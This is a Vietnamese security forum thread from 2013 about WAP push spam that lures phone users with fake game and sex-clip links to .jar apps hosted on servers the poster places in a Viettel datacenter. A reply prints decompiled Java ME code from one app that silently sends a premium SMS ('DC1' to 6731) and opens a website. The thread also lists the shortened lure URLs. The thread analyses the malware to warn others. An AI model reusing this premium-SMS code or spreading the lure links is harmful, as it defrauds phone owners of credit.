English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Viettel có liên quan đến việc phát tán malware?  XML
  [Question]   Viettel có liên quan đến việc phát tán malware? 30/03/2013 15:21:58 (+0700) | #1 | 274532
minhdanh72
Member
[Minus]    0    [Plus]
Joined: 12/01/2011 08:10:12
Messages: 7
Offline
[Profile] [PM]
Mấy ngày gần đây, nhà cháu liên tục nhận được nhiều "Wap push message" vào điện thoại, nội dung đều nghe rất hấp dẫn, đại loại như: tải game miễn phí - chơi cực phê, clip sex thiếu gia và hoa hậu 17p, sinh viên bị quay lén trong nhà nghỉ... Tất cả đều kèm theo các liên kết rút gọn:
http://www.tinyurl.com/hbgame
http://www.bit.ly/zzgame
http://goo.gl/IVc1p
http://goo.gl/2dFIm
...
Các liên kết này khi nhấn vào đều trỏ tới các file có đuôi là .jar (hbgame.jar, XemClip.jar...), nếu mở bằng di động có java thì máy sẽ hỏi người dùng có muốn cài đặt ứng dụng hay không.
Nhà cháu cũng không lạ gì mấy kiểu "gài hàng" này nên không dại gì cài đặt, nhưng có thể chắc chắn là các ứng dụng này được gửi đến với mục đích không được thánh thiện cho lắm. Khi xem kỹ hơn các url gửi đến, các ứng dụng đều được host trên các server có địa chỉ: 210.211.98.230, 210.211.98.73
Điều đáng nói là các sever này đều đặt tại datacenter của Viettel.
Phải chăng có gì mờ ám đằng sau các file .jar này?
Nhờ anh/chị/em trả lời giúp nhà cháu.
[Up] [Print Copy]
  [Question]   Viettel có liên quan đến việc phát tán malware? 30/03/2013 16:07:47 (+0700) | #2 | 274534
BlueMM
Member
[Minus]    0    [Plus]
Joined: 14/02/2012 05:11:33
Messages: 28
Offline
[Profile] [PM]
2 link đầu đều bị anti virus kill ngay tức khắc. Bạn có thể dùng http://java.decompiler.free.fr/?q=jdgui để xem mã nguồn của chúng. Đây là mã nguồn của file XemClip.jar:

Có vẻ nó sẽ gửi DC1 đến số 6731, và bạn sẽ mất 15k trong tài khoản.

Code:
package main;

import java.io.PrintStream;
import javax.microedition.io.Connector;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;

final class b extends Thread
{
  private final c a;

  b(c paramc)
  {
    this.a = paramc;
  }

  public final void run()
  {
    try
    {
      Thread.sleep(700L);
      int i = -1;
      String str2 = "6731";
      String str1 = "DC1";
      System.out.println("SMS: " + str1 + " To: " + str2);
      if ((str2 == null) || ("".equals(str2.trim())))
        throw new IllegalArgumentException("Phone number is invalid");
      MessageConnection localMessageConnection;
      TextMessage localTextMessage;
      (localTextMessage = (TextMessage)(localMessageConnection = (MessageConnection)Connector.open(str2 = "sms://" + str2)).newMessage("text")).setAddress(str2);
      localTextMessage.setPayloadText(str1);
      localMessageConnection.send(localTextMessage);
      try
      {
        if (localMessageConnection != null)
          localMessageConnection.close();
      }
      catch (Exception localException1)
      {
      }
      this.a.a.switchDisplayable(null, new a(this.a.a));
      return;
    }
    catch (Exception localException2)
    {
      this.a.a.notifyDestroyed();
    }
  }
}


Code:
package main;

final class d extends Thread
{
  private final a a;

  d(a parama)
  {
    this.a = parama;
  }

  public final void run()
  {
    try
    {
      Thread.sleep(1000L);
      this.a.a.platformRequest("http://xclip.vn");
      return;
    }
    catch (Exception localException)
    {
      this.a.a.notifyDestroyed();
    }
  }
}
[Up] [Print Copy]
  [Question]   Viettel có liên quan đến việc phát tán malware? 30/03/2013 17:48:56 (+0700) | #3 | 274535
minhdanh72
Member
[Minus]    0    [Plus]
Joined: 12/01/2011 08:10:12
Messages: 7
Offline
[Profile] [PM]
Cảm ơn BlueMM về thông tin hữu ích.
[Up] [Print Copy]
  [Question]   Viettel có liên quan đến việc phát tán malware? 01/04/2013 22:11:22 (+0700) | #4 | 274594
[Avatar]
 F10
Member
[Minus]    0    [Plus]
Joined: 01/12/2008 23:38:12
Messages: 89
Offline
[Profile] [PM]
Hi Minhdanh72!
Bạn có thể miêu tả chi tiết hơn về thông tin số điện thoại gửi wap push message đó về cho bạn là gì được không? Số đó có thay đổi liên tục không hay là giữ nguyên mỗi lần gửi message.
[Up] [Print Copy]
  [Question]   Viettel có liên quan đến việc phát tán malware? 03/04/2013 20:10:35 (+0700) | #5 | 274659
minhdanh72
Member
[Minus]    0    [Plus]
Joined: 12/01/2011 08:10:12
Messages: 7
Offline
[Profile] [PM]
Hi, chào F10, tiếc là những tin đó mình đã xoá rồi nên không còn số gửi tới nữa, và từ hôm đó tới nay không có tin gửi tới nữa. Mình chỉ nhớ là có một vài số được gửi từ một số (có vẻ như là) của tổng đài Mobifone, (vì có dạng +8490000...6), và một số trong giống như số sim rác (+8412....).
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|